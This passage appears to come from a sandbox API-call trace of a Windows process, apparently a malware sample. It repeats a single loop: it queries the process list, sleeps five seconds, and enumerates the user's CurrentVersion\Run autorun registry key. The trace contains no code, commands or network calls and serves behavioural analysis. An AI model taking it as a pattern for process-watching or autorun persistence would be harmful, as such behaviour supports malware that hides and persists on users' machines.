RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.962] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.971] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.971] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.971] NtClose (Handle=0x154) returned 0x0 [0183.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.975] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.987] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.987] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.987] NtClose (Handle=0x154) returned 0x0 [0183.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.992] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.003] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.003] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.003] NtClose (Handle=0x154) returned 0x0 [0184.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.007] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.019] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.020] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.020] NtClose (Handle=0x154) returned 0x0 [0184.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.034] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.034] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.034] NtClose (Handle=0x154) returned 0x0 [0184.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.049] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.049] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.049] NtClose (Handle=0x154) returned 0x0 [0184.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.054] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.065] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.065] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.065] NtClose (Handle=0x154) returned 0x0 [0184.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.069] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.080] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.080] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.080] NtClose (Handle=0x154) returned 0x0 [0184.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.085] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.096] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.096] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.096] NtClose (Handle=0x154) returned 0x0 [0184.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.100] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.112] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.112] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.112] NtClose (Handle=0x154) returned 0x0 [0184.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.116] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.128] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.128] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.128] NtClose (Handle=0x154) returned 0x0 [0184.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.143] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.143] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.143] NtClose (Handle=0x154) returned 0x0 [0184.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.147] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.160] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.161] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.161] NtClose (Handle=0x154) returned 0x0 [0184.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.164] NtFreeVirtualMemory 